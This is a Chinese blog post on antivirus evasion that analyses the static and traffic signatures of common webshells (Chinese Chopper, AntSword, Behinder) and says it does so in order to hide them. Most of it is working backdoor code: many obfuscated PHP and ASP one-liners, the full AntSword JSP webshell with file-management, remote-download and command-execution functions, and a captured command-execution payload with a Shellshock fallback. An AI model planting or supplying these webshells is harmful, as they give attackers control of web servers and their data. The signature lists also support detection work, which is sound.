免杀基础-常见Webshell特征分析

admin 2022年4月13日20:06:25安全文章评论42 views72285字阅读240分57秒阅读模式

免杀基础-常见Webshell特征分析

前面我们提到了,杀软通过识别特征码来完成对木马的检测,所以在进行免杀之前需要对我们经常使用的木马特征进行分析,只有了解这些特征,我们才能针对这些特征进行隐藏,从而完成免杀

Webshell简介

Webshell是web入侵的脚本攻击工具

简单来讲,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。

最常见的一句话木马

php一句话木马


<?php eval(@$_POST['a']);?>
<?php assert(@$_POST['a']);?>
<?php $fun = create_function('',$_POST['a']);$fun();?> <?php@call_user_func(assert,$_POST['a']);?> <?php @preg_replace("/abcde/e", $_POST['a'], "abcdefg");?> <?php$test='<?php $a=$_POST["cmd"];assert($a); ?>';file_put_contents("Trojan.php", $test);?>

asp一句话木马

<%eval request("chopper")%>
<%execute request("chopper")%>
<%execute(request("chopper"))%>
<%ExecuteGlobal request("chopper")%>
<%Eval(Request(chr(35)))%>
<%dy=request("c")%><%Eval(dy)%>
<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>
<% if Request("c")<>"" then ExecuteGlobal request("c") end if %>
<%execute request("c")%><%'<% loop <%:%>
< %'<% loop <%:%><%execute request("a")%>
<script language=vbs runat=server>eval(request("c"))</script>
<script language=VBScript runat=server>execute request("#")</script>
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
<%execute(unescape("eval%20request%28%22aaa%22%29"))%>

中国菜刀

中国菜刀自诞生以来已经历了多个版本的更新,其功能、隐秘性也随着更新得到很大提升。菜刀现在主流有三个版本在使用,分别为2011版、2014版、2016版,这三个版本中从2011版本到2014版本是功能性上进行了增强,从2014版本到2016版本是在隐秘性上进行了增强,2016版本的菜刀流量加入了混淆,使其链接流量更具有混淆性。

中国菜刀基本支持PHP、JSP、ASP这三种WebShell的连接,这三种语言所对应的流量各有差异,各个版本也有不用。

中国菜刀的流量特征十分明显,现如今的安全设备基本上都可以识别到菜刀的流量。现在的菜刀基本上也只是用于安全教学,在实战中很少用到。


菜刀webshell静态特征

菜刀使用的webshell为一句话木马,特征十分明显

常见一句话(Eval):

PHP

<?php @eval($_POST['caidao']);?>

ASP:

<%eval request("caidao")%>

ASP.NET

<%@ Page Language="Jscript"%><%eval(Request.Item["caidao"],"unsafe");%>

菜刀webshell动态特征

这里以本地靶机抓到的一个请求报文进行分析

POST /1.php HTTP/1.1X-Forwarded-For: 0.200.191.153Referer: http://localhost/Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Host: localhostContent-Length: 423Cache-Control: no-cacheConnection: close
test=array_map("ass"."ert",array("ev"."Al("\$xx%3D\"Ba"."SE6"."4_dEc"."OdE\";@

ev"."al(\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZ

ihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEYJ0Q6XFxwaHBzdHVkeV9wcm9cXFdXV1xcMS5waHAnOyRQPUBmb3BlbigkRiwncicpO2VjaG8oQGZyZWFkKCRQLGZpbGVzaXplKCRGKSkpO0BmY2xvc2UoJFApOztlY2hvKCJYQFkiKTtkaWUoKTs%3D'));");"));

特征:

  1. User-Agent为百度爬虫

  2. 请求体中存在eval,base64等特征字符

  3. 请求体中传递的payload为base64编码,并且存在固定的QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

  4. 请求体中执行结果响应为明文,格式为

[email protected]
结果
[email protected]


免杀基础-常见Webshell特征分析


  1. 请求包可以使用base64编码进行解码


免杀基础-常见Webshell特征分析

AntSword

AntSword——蚁剑是一个开放源代码,跨平台的网站管理工具,主要是为了满足渗透测试人员以及具有权限或授权的安全研究人员以及网站管理员的需求。其实蚁剑的很多代码都是源于中国菜刀,所以他的链接流量与中国菜刀很相似,但是蚁剑的可扩充性很好,可以对其进行加密、混淆等绕过处理,蚁剑默认支持asp以及php的webshell连接。

AntSword webshell静态特征

蚁剑官方位我们提供了只做好的后门,官方的脚本均做了不同程度的“变异”,蚁剑的核心代码是由猜到修改而来的,所有普通的一句话木马也可以使用

php木马特征

使用assert、eval执行

asp木马特征

使用eval

jsp木马特征

使用Java类加载(ClassLoader),同时会带有base64编码等字符特征

<?php /*** _ ____ _* __ _ _ __ | |_/ ___|_ _____ _ __ __| |* / _` | '_ | _____ / / / _ | '__/ _` |* | (_| | | | | |_ ___) V V / (_) | | | (_| |* __,_|_| |_|__|____/ _/_/ ___/|_| __,_|* ———————————————————————————————————————————————* AntSword PHP assert Script* * 警告:* 此脚本仅供合法的渗透测试以及爱好者参考学习* 请勿用于非法用途,否则将追究其相关责任!* ———————————————————————————————————————————————* pwd=ant*/$ant=base64_decode("YXNzZXJ0");$ant($_POST['ant']);?><!-- /*** _ ____ _* __ _ _ __ | |_/ ___|_ _____ _ __ __| |* / _` | '_ | _____ / / / _ | '__/ _` |* | (_| | | | | |_ ___) V V / (_) | | | (_| |* __,_|_| |_|__|____/ _/_/ ___/|_| __,_|* ———————————————————————————————————————————————* AntSword ASP eval xxxx Script* * 警告:* 此脚本仅供合法的渗透测试以及爱好者参考学习* 请勿用于非法用途,否则将追究其相关责任!* ———————————————————————————————————————————————** 密码: ant** 此脚本需与 asp xxxxdog 编码器配套使用--><%Function xxxx(str) eval str End Function%><%D = request("ant")%><%xxxx D%><%-- _ ____ _ __ _ _ __ | |_/ ___|_ _____ _ __ __| | / _` | '_ | _____ / / / _ | '__/ _` || (_| | | | | |_ ___) V V / (_) | | | (_| | __,_|_| |_|__|____/ _/_/ ___/|_| __,_|——————————————————————————————————————————————— AntSword JSP Custom Script for Mysql 警告: 此脚本仅供合法的渗透测试以及爱好者参考学习 请勿用于非法用途,否则将追究其相关责任!———————————————————————————————————————————————
说明: 1. AntSword >= v2.1.0 2. 创建 Shell 时选择 custom 模式连接 3. 数据库连接: com.mysql.jdbc.Driver jdbc:mysql://localhost/test?user=root&password=123456
注意:以上是两行 4. 本脚本中 encoder/decoder 与 AntSword 添加 Shell 时选择的 encoder/decoder 要一致,如果选择 default 则需要将值设置为空
已知问题: 1. 文件管理遇到中文文件名显示的问题ChangeLog: v1.9 1. 修复由于decode函数与EC函数位置写反而导致的乱码问题 v1.8 1. 修复 hex 解码时 0A 丢失前缀0的问题 v1.7 1. 新增 AES 编码/解码 支持 (thx @Ch1ngg) 2. 新增 Version, 直接访问不带任何参数会返回当前 shell 的版本号 v1.6 1. 新增 4 种解码器支持 v1.5 1. 修正 base64 编码器下连接数据库 characterEncoding 出错 v1.4 1. 修正 windows 下基础路径获取盘符会出现小写的情况 v1.3 1. 修正上传文件超过1M时的bug 2. 修正weblogic war 包布署获取路径问题 3. 修正文件中文字符问题 Date: 2016/04/29 v1.2 1. 修正修改包含结束tag的文件会出错的 bug Date: 2016/04/06 v1.1 1. 修正下载文件参数设置错误 2. 修正一些注释的细节 Date: 2016/03/26 v1 1. 文件系统 和 terminal 管理 2. mysql 数据库支持 3. 支持 base64 和 hex 编码--%><%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,javax.crypto.*,java.security.*,javax.crypto.spec.*" contentType="text/html;charset=UTF-8"%><%!// ################################################################# String Pwd = "ant"; //连接密码 // 编码器 String encoder = ""; // default (明文) // String encoder = "base64"; // base64 // String encoder = "hex"; // hex(推荐) // String encoder = "aes"; // aes(加密方式见下文aes配置)
// 解码器 String decoder = ""; // default (明文) // String decoder = "base64"; // base64 中文正常 // String decoder = "hex"; // hex 中文可能有问题 // String decoder = "hex_base64"; // hex(base64) // 中文正常 // String decoder = "aes_base64"; // aes(base64) (加密方式见下文aes配置) // 其它配置 String cs = "UTF-8"; // 字符集编码 String SessionKey = "CUSTOMSESSID"; // 自定义sessionkey id String RetS = "LT58"; // 数据起始分割符 base64 String RetE = "fDwt"; // 数据结束分割符 base64 // aes 加密配置项 /* * aes-128-cfb_zero_padding: * - aes_mode: CFB * - aes_padding: NoPadding * - aes_keylen: 16
* aes-256-ecb_zero_padding: * - aes_mode: ECB * - aes_padding: NoPadding * - aes_keylen: 32 */ // 注意: 以下4项为 encoder/decoder 共用 // 如果需要请求和返回采用不同方式, 自行修改 String aes_mode = "CFB"; // CBC|ECB|CFB| String aes_padding = "NoPadding"; // NoPadding|PKCS5Padding|PKCS7Padding int aes_keylen = 16; // 16|32 // 16(AES-128) 32(AES-256) String aes_key_padding = "a"; // 获取到的 key 位数不够时填充字符// ################################################################ String AesKey = ""; String Version = "1.8";
String EC(String s) throws Exception { if(encoder.equals("hex") || encoder == "hex") return s; return new String(s.getBytes(), cs); }
String showDatabases(String encode, String conn) throws Exception { String sql = "show databases"; String columnsep = "t"; String rowsep = ""; return executeSQL(encode, conn, sql, columnsep, rowsep, false); }
String showTables(String encode, String conn, String dbname) throws Exception { String sql = "show tables from " + dbname; String columnsep = "t"; String rowsep = ""; return executeSQL(encode, conn, sql, columnsep, rowsep, false); }
String showColumns(String encode, String conn, String dbname, String table) throws Exception { String columnsep = "t"; String rowsep = ""; String sql = "select * from " + dbname + "." + table + " limit 0,0"; return executeSQL(encode, conn, sql, columnsep, rowsep, true); }
String query(String encode, String conn, String sql) throws Exception { String columnsep = "t|t"; String rowsep = "rn"; return executeSQL(encode, conn, sql, columnsep, rowsep, true); }
String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname) throws Exception { String ret = ""; conn = (EC(conn)); String[] x = conn.trim().replace("rn", "n").split("n"); Class.forName(x[0].trim()); String url = x[1] + "&characterEncoding=" +encode; Connection c = DriverManager.getConnection(url); Statement stmt = c.createStatement(); ResultSet rs = stmt.executeQuery(sql); ResultSetMetaData rsmd = rs.getMetaData();
if (needcoluname) { for (int i = 1; i <= rsmd.getColumnCount(); i++) { String columnName = rsmd.getColumnName(i); ret += columnName + columnsep; } ret += rowsep; }
while (rs.next()) { for (int i = 1; i <= rsmd.getColumnCount(); i++) { String columnValue = rs.getString(i); ret += columnValue + columnsep; } ret += rowsep; } return ret; }
String WwwRootPathCode(String d) throws Exception { String s = ""; if (!d.substring(0, 1).equals("/")) { File[] roots = File.listRoots(); for (int i = 0; i < roots.length; i++) { s += roots[i].toString().substring(0, 2) + ""; } } else { s += "/"; } return s; }
String FileTreeCode(String dirPath) throws Exception { File oF = new File(dirPath), l[] = oF.listFiles(); String s = "", sT, sQ, sF = ""; java.util.Date dt; String fileCode=(String)System.getProperties().get("file.encoding"); SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); for (int i = 0; i < l.length; i++) { dt = new java.util.Date(l[i].lastModified()); sT = fm.format(dt); sQ = l[i].canRead() ? "R" : ""; sQ += l[i].canWrite() ? " W" : ""; String nm = new String(l[i].getName().getBytes(fileCode), cs); if (l[i].isDirectory()) { s += nm + "/t" + sT + "t" + l[i].length() + "t" + sQ + "n"; } else { sF += nm + "t" + sT + "t" + l[i].length() + "t" + sQ + "n"; } } s += sF; return new String(s.getBytes(fileCode), cs); }
String ReadFileCode(String filePath) throws Exception { String l = "", s = ""; BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(filePath)), cs)); while ((l = br.readLine()) != null) { s += l + "rn"; } br.close(); return s; }
String WriteFileCode(String filePath, String fileContext) throws Exception { String h = "0123456789ABCDEF"; String fileHexContext = strtohexstr(fileContext); File f = new File(filePath); FileOutputStream os = new FileOutputStream(f); for (int i = 0; i < fileHexContext.length(); i += 2) { os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1)))); } os.close(); return "1"; }
String DeleteFileOrDirCode(String fileOrDirPath) throws Exception { File f = new File(fileOrDirPath); if (f.isDirectory()) { File x[] = f.listFiles(); for (int k = 0; k < x.length; k++) { if (!x[k].delete()) { DeleteFileOrDirCode(x[k].getPath()); } } } f.delete(); return "1"; }
void DownloadFileCode(String filePath, HttpServletResponse r) throws Exception { int n; byte[] b = new byte[512]; r.reset(); ServletOutputStream os = r.getOutputStream(); BufferedInputStream is = new BufferedInputStream(new FileInputStream(filePath)); os.write(("->"+"|").getBytes(), 0, 3); while ((n = is.read(b, 0, 512)) != -1) { os.write(b, 0, n); } os.write(("|"+"<-").getBytes(), 0, 3); os.close(); is.close(); }
String UploadFileCode(String savefilePath, String fileHexContext) throws Exception { String h = "0123456789ABCDEF"; File f = new File(savefilePath); f.createNewFile(); FileOutputStream os = new FileOutputStream(f,true); for (int i = 0; i < fileHexContext.length(); i += 2) { os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1)))); } os.close(); return "1"; }
String CopyFileOrDirCode(String sourceFilePath, String targetFilePath) throws Exception { File sf = new File(sourceFilePath), df = new File(targetFilePath); if (sf.isDirectory()) { if (!df.exists()) { df.mkdir(); } File z[] = sf.listFiles(); for (int j = 0; j < z.length; j++) { CopyFileOrDirCode(sourceFilePath + "/" + z[j].getName(), targetFilePath + "/" + z[j].getName()); } } else { FileInputStream is = new FileInputStream(sf); FileOutputStream os = new FileOutputStream(df); int n; byte[] b = new byte[1024]; while ((n = is.read(b, 0, 1024)) != -1) { os.write(b, 0, n); } is.close(); os.close(); } return "1"; }
String RenameFileOrDirCode(String oldName, String newName) throws Exception { File sf = new File(oldName), df = new File(newName); sf.renameTo(df); return "1"; }
String CreateDirCode(String dirPath) throws Exception { File f = new File(dirPath); f.mkdir(); return "1"; }
String ModifyFileOrDirTimeCode(String fileOrDirPath, String aTime) throws Exception { File f = new File(fileOrDirPath); SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); java.util.Date dt = fm.parse(aTime); f.setLastModified(dt.getTime()); return "1"; }
String WgetCode(String urlPath, String saveFilePath) throws Exception { URL u = new URL(urlPath); int n = 0; FileOutputStream os = new FileOutputStream(saveFilePath); HttpURLConnection h = (HttpURLConnection) u.openConnection(); InputStream is = h.getInputStream(); byte[] b = new byte[512]; while ((n = is.read(b)) != -1) { os.write(b, 0, n); } os.close(); is.close(); h.disconnect(); return "1"; }
String SysInfoCode(HttpServletRequest r) throws Exception { String d = ""; try { if(r.getSession().getServletContext().getRealPath("/") != null){ d = r.getSession().getServletContext().getRealPath("/"); }else{ String cd = this.getClass().getResource("/").getPath(); d = new File(cd).getParent(); } } catch (Exception e) { String cd = this.getClass().getResource("/").getPath(); d = new File(cd).getParent(); } d = String.valueOf(d.charAt(0)).toUpperCase() + d.substring(1); String serverInfo = (String)System.getProperty("os.name"); String separator = File.separator; String user = (String)System.getProperty("user.name"); String driverlist = WwwRootPathCode(d); return d + "t" + driverlist + "t" + serverInfo + "t" + user; }
boolean isWin() { String osname = (String)System.getProperty("os.name"); osname = osname.toLowerCase(); if (osname.startsWith("win")) return true; return false; }
String ExecuteCommandCode(String cmdPath, String command) throws Exception { StringBuffer sb = new StringBuffer(""); String[] c = { cmdPath, !isWin() ? "-c" : "/c", command }; Process p = Runtime.getRuntime().exec(c); CopyInputStream(p.getInputStream(), sb); CopyInputStream(p.getErrorStream(), sb); return sb.toString(); } String getEncoding(String str) { String encode[] = new String[]{ "UTF-8", "ISO-8859-1", "GB2312", "GBK", "GB18030", "Big5", "Unicode", "ASCII" }; for (int i = 0; i < encode.length; i++){ try { if (str.equals(new String(str.getBytes(encode[i]), encode[i]))) { return encode[i]; } } catch (Exception ex) { } } return ""; } String strtohexstr(String fileContext)throws Exception{ String h = "0123456789ABCDEF"; byte[] bytes = fileContext.getBytes(cs); StringBuilder sb = new StringBuilder(bytes.length * 2); for (int i = 0; i < bytes.length; i++) { sb.append(h.charAt((bytes[i] & 0xf0) >> 4)); sb.append(h.charAt((bytes[i] & 0x0f) >> 0)); } String fileHexContext = sb.toString(); return fileHexContext; }
String asenc(String str, String decode) throws Exception{ if(decode.equals("hex") || decode=="hex"){ return strtohexstr(str); }else if(decode.equals("base64") || decode == "base64"){ String sb = ""; sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder(); sb = encoder.encode(str.getBytes()); return sb; }else if(decode.equals("hex_base64") || decode == "hex_base64"){ return asenc(asenc(str, "base64"), "hex"); }else if(decode.equals("aes_base64") || decode == "aes_base64"){ String sb1 = ""; sb1 = AesEncrypt(AesKey, asenc(str, "base64")); return sb1.replace("rn",""); } return str; }
String decode(String str) { byte[] bt = null; try { sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder(); bt = decoder.decodeBuffer(str); } catch (IOException e) { e.printStackTrace(); } return new String(bt); } String decode(String str, String encode) throws Exception{ if(encode.equals("hex") || encode=="hex"){ if(str=="null"||str.equals("null")){ return ""; } String hexString = "0123456789ABCDEF"; str = str.toUpperCase(); ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length()/2); String ss = ""; for (int i = 0; i < str.length(); i += 2){ ss = ss + (hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))) + ","; baos.write((hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1)))); } return baos.toString(cs); }else if(encode.equals("base64") || encode == "base64"){ byte[] bt = null; sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder(); bt = decoder.decodeBuffer(str); return new String(bt,cs); }else if(encode.equals("aes") || encode == "aes") { String str1 = AesDecrypt(AesKey, str); return str1.trim(); } return str; }
String AesEncrypt(String key, String cleartext) throws Exception { IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes()); SecretKeySpec keys = new SecretKeySpec(key.getBytes(), "AES"); Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding)); cipher.init(Cipher.ENCRYPT_MODE, keys, zeroIv); byte[] encryptedData = cipher.doFinal(cleartext.getBytes("UTF-8")); sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder(); String sb = encoder.encode(encryptedData); return sb; }
String AesDecrypt(String key ,String encrypted) throws Exception { sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder(); byte[] byteMi = decoder.decodeBuffer(encrypted); IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes()); SecretKeySpec keys = new SecretKeySpec(key.getBytes("UTF-8"), "AES"); Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding)); cipher.init(Cipher.DECRYPT_MODE, keys, zeroIv); byte[] decryptedData = cipher.doFinal(byteMi); return new String(decryptedData, "UTF-8"); }
String getKeyFromCookie(Cookie[] cookies){ String key = ""; StringBuilder result = new StringBuilder(); if( cookies != null ){ for (Cookie c : cookies) { if (c.getName().equals(SessionKey)) { key = c.getValue(); break; } } } if(key.length() < aes_keylen){ for(int i=0;key.length() < aes_keylen;i++){ key += aes_key_padding; } }if(key.length() > aes_keylen){ key = key.substring(0,aes_keylen); } return key; }
void CopyInputStream(InputStream is, StringBuffer sb) throws Exception { String l; BufferedReader br = new BufferedReader(new InputStreamReader(is, cs)); while ((l = br.readLine()) != null) { sb.append(l + "rn"); } br.close(); }%><% response.setContentType("text/html"); request.setCharacterEncoding(cs); response.setCharacterEncoding(cs); StringBuffer output = new StringBuffer(""); StringBuffer sb = new StringBuffer(""); Cookie cookie = new Cookie(SessionKey, session.getId()); response.addCookie(cookie); try { AesKey = getKeyFromCookie(request.getCookies()); String funccode = EC(request.getParameter(Pwd) + ""); String z0 = EC(decode(request.getParameter("z0")+"", encoder)); String z1 = EC(decode(request.getParameter("z1")+"", encoder)); String z2 = EC(decode(request.getParameter("z2")+"", encoder)); String z3 = EC(decode(request.getParameter("z3")+"", encoder)); String[] pars = { z0, z1, z2, z3}; output.append(decode(RetS,"base64"));
if (funccode.equals("B")) { sb.append(FileTreeCode(pars[1])); } else if (funccode.equals("C")) { sb.append(ReadFileCode(pars[1])); } else if (funccode.equals("D")) { sb.append(WriteFileCode(pars[1], pars[2])); } else if (funccode.equals("E")) { sb.append(DeleteFileOrDirCode(pars[1])); } else if (funccode.equals("F")) { DownloadFileCode(pars[1], response); } else if (funccode.equals("U")) { sb.append(UploadFileCode(pars[1], pars[2])); } else if (funccode.equals("H")) { sb.append(CopyFileOrDirCode(pars[1], pars[2])); } else if (funccode.equals("I")) { sb.append(RenameFileOrDirCode(pars[1], pars[2])); } else if (funccode.equals("J")) { sb.append(CreateDirCode(pars[1])); } else if (funccode.equals("K")) { sb.append(ModifyFileOrDirTimeCode(pars[1], pars[2])); } else if (funccode.equals("L")) { sb.append(WgetCode(pars[1], pars[2])); } else if (funccode.equals("M")) { sb.append(ExecuteCommandCode(pars[1], pars[2])); } else if (funccode.equals("N")) { sb.append(showDatabases(pars[0], pars[1])); } else if (funccode.equals("O")) { sb.append(showTables(pars[0], pars[1], pars[2])); } else if (funccode.equals("P")) { sb.append(showColumns(pars[0], pars[1], pars[2], pars[3])); } else if (funccode.equals("Q")) { sb.append(query(pars[0], pars[1], pars[2])); } else if (funccode.equals("A")) { sb.append(SysInfoCode(request)); }else{ sb.append(Version); } } catch (Exception e) { sb.append("ERROR" + ":// " + e.toString()); } try { output.append(asenc(sb.toString(), decoder)); }catch (Exception e) { sb.append("ERROR" + ":// " + e.toString()); } output.append(decode(RetE, "base64")); out.print(output.toString());%>

AntSword webshell动态特征

这里我们对抓取到的一句话webshell流量包进行分析

POST /1.php HTTP/1.1Host: localhostAccept-Encoding: gzip, deflateUser-Agent: Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11Content-Type: application/x-www-form-urlencodedContent-Length: 4564Connection: close
a=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24oparr%3Dpreg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24opdir)%3B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24tmdir%3D%22.8ffc0%22%3B%40mkdir(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%22..%22)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24oparr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24ocwd.%22%2F%22.%24tmdir)%3B%7D%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2239%22.%22344%22%3Becho%20%40asenc(%24output)%3Becho%20%22c0b7%22.%22944b7%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(substr(%24_POST%5B%22xd7cdb44e2a206%22%5D%2C2))%3B%24s%3Dbase64_decode(substr(%24_POST%5B%22j6a20c13d709ac%22%5D%2C2))%3B%24envstr%3D%40base64_decode(substr(%24_POST%5B%22icab0fb61b302a%22%5D%2C2))%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3Bif(substr(%24d%2C0%2C1)%3D%3D%22%2F%22)%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%22)%3B%7Delse%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3BC%3A%2FWindows%2Fsystem32%3BC%3A%2FWindows%2FSysWOW64%3BC%3A%2FWindows%3BC%3A%2FWindows%2FSystem32%2FWindowsPowerShell%2Fv1.0%2F%3B%22)%3B%7Dif(!empty(%24envstr))%7B%24envarr%3Dexplode(%22%7C%7C%7Casline%7C%7C%7C%22%2C%20%24envstr)%3Bforeach(%24envarr%20as%20%24v)%20%7Bif%20(!empty(%24v))%20%7B%40putenv(str_replace(%22%7C%7C%7Caskey%7C%7C%7C%22%2C%20%22%3D%22%2C%20%24v))%3B%7D%7D%7D%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%3B%7Delse%7B%24d%3Darray_map('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runshellshock(%24d%2C%20%24c)%20%7Bif%20(substr(%24d%2C%200%2C%201)%20%3D%3D%20%22%2F%22%20%26%26%20fe('putenv')%20%26%26%20(fe('error_log')%20%7C%7C%20fe('mail')))%20%7Bif%20(strstr(readlink(%22%2Fbin%2Fsh%22)%2C%20%22bash%22)%20!%3D%20FALSE)%20%7B%24tmp%20%3D%20tempnam(sys_get_temp_dir()%2C%20'as')%3Bputenv(%22PHP_LOL%3D()%20%7B%20x%3B%20%7D%3B%20%24c%20%3E%24tmp%202%3E%261%22)%3Bif%20(fe('error_log'))%20%7Berror_log(%22a%22%2C%201)%3B%7D%20else%20%7Bmail(%22a%40127.0.0.1%22%2C%20%22%22%2C%20%22%22%2C%20%22-bv%22)%3B%7D%7D%20else%20%7Breturn%20False%3B%7D%24output%20%3D%20%40file_get_contents(%24tmp)%3B%40unlink(%24tmp)%3Bif%20(%24output%20!%3D%20%22%22)%20%7Bprint(%24output)%3Breturn%20True%3B%7D%7Dreturn%20False%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C2048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('proc_open'))%7B%24p%20%3D%20%40proc_open(%24c%2C%20array(1%20%3D%3E%20array('pipe'%2C%20'w')%2C%202%20%3D%3E%20array('pipe'%2C%20'w'))%2C%20%24io)%3Bwhile(!%40feof(%24io%5B1%5D))%7Bprint(%40fgets(%24io%5B1%5D%2C2048))%3B%7Dwhile(!%40feof(%24io%5B2%5D))%7Bprint(%40fgets(%24io%5B2%5D%2C2048))%3B%7D%40fclose(%24io%5B1%5D)%3B%40fclose(%24io%5B2%5D)%3B%40proc_close(%24p)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delseif(runshellshock(%24d%2C%20%24c))%20%7Breturn%20%24ret%3B%7Delseif(substr(%24d%2C0%2C1)!%3D%22%2F%22%20%26%26%20%40class_exists(%22COM%22))%7B%24w%3Dnew%20COM('WScript.shell')%3B%24e%3D%24w-%3Eexec(%24c)%3B%24so%3D%24e-%3EStdOut()%3B%24ret.%3D%24so-%3EReadAll()%3B%24se%3D%24e-%3EStdErr()%3B%24ret.%3D%24se-%3EReadAll()%3Bprint(%24ret)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&icab0fb61b302a=co&j6a20c13d709ac=hLY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1ciJndob2FtaSZlY2hvIGQ1OWMwJmNkJmVjaG8gY2UwNjdmMTA2OQ%3D%3D&xd7cdb44e2a206=ryY21k

post请求方式,参数为一句话木马的密码

每个请求体中都存在

@ini_set("display_errors", "0");@set_time_limit(0)

开头,并且存在base64等字符


免杀基础-常见Webshell特征分析


返回包的结果格式为

随机数结果随机数

免杀基础-常见Webshell特征分析

冰蝎

冰蝎是一款动态二进制加密网站管理客户端。

冰蝎webshell静态特征

这里的分析以冰蝎3.0为例

采用预共享密钥,密钥格式为md5(“admin”)[0:16], 所以在各种语言的webshell中都会存在16位数的连接密码,默认变量为k。

在PHP中会判断是否开启openssl采用不同的加密算法,在代码中同样会存在eval或assert等字符特征

